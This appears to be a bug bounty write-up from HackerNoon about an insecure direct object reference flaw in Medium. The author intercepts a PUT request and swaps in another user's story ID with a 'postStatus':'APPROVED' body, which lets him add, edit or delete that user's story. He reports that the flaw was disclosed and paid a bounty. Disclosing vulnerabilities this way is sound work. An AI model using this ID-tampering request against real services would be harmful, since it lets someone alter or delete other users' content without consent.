Update and Delete any Story of any user on Medium by@ajdumanhug

Update and Delete any Story of any user on Medium

Read on Terminal Reader
react to story with heart
react to story with light
react to story with boat
react to story with money
image
Aj Dumanhug HackerNoon profile picture

Aj Dumanhug

image

Before the end of this year, Two well-known people was hacked. Mark Zuckerberg (CEO) of Facebook and Sundar Pichai (CEO) of Google and I was thinking what if it’s time for me to hack Barack Obama. But, I know that isn’t easy.


So, I decided to use my big brain to think my way out!Looking for a new angle… Then, I found the “Request Story” button hiding in the ‘ellipsis’ or ‘more’ icon.

image

But, there’s a problem. They, need to approve my request to add their story into my publication and that’s absolutely impossible. But apparently, I can add my own story into my publication without further ado.

image

First step of adding a story to publication.

image

Second and Last step is to choose a publication where you want to add the story.

My goal here is to add any story of another user into my publication without their consent and I did that using the “Add story to publication” button.

While I’m adding my own story to my publication, I intercepted the HTTP Request to modify the story ID.


My Story ID: 2a4b6810c12dStory ID of the target: 1a3b579c101a

The HTTP Request:














PUT /testphzxc/2a4b6810c12d HTTP/1.1Host: medium.comConnection: keep-aliveContent-Length: 25Accept: application/jsonOrigin: https://medium.comX-XSRF-Token: {Redacted}X-Obvious-CID: webUser-Agent: {Redacted}Content-Type: application/jsonReferer: {Redacted}Accept-Encoding: gzip, deflate, sdch, brAccept-Language: en-US,en;q=0.8,nb;q=0.6Cookie: {Redacted}

{“postStatus”:”APPROVED”}

In the line where the PUT method is located, you will see the ID of my story. And I will remove that ID and put the ID of the target’s story.

Updated HTTP Request:














PUT /testphzxc/1a3b579c101a HTTP/1.1Host: medium.comConnection: keep-aliveContent-Length: 25Accept: application/jsonOrigin: https://medium.comX-XSRF-Token: {Redacted}X-Obvious-CID: webUser-Agent: {Redacted}Content-Type: application/jsonReferer: {Redacted}Accept-Encoding: gzip, deflate, sdch, brAccept-Language: en-US,en;q=0.8,nb;q=0.6Cookie: {Redacted}

{“postStatus”:”APPROVED”}

Of course, like what I’ve just mentioned above, the story will automatically added to my publication without their consent. That is because of:

{“postStatus”:”APPROVED”}

Then *Poof*. The Target’s story was added to my publication.

Now What? Because the story was added to my publication, I am now able to edit his/her story or delete it.


Well, instead of attacking Mr. Obama’s blog, I reported it to Medium. They fixed it and rewarded me with a $250 bounty but I want more because I found multiple bugs in my report. First, Bypass the Request Story and Two, Update and Delete any story. Then, they added the previous bounty with a $100 bounty for a total of $350 bounty.

react to story with heart
react to story with light
react to story with boat
react to story with money
L O A D I N G
. . . comments & more!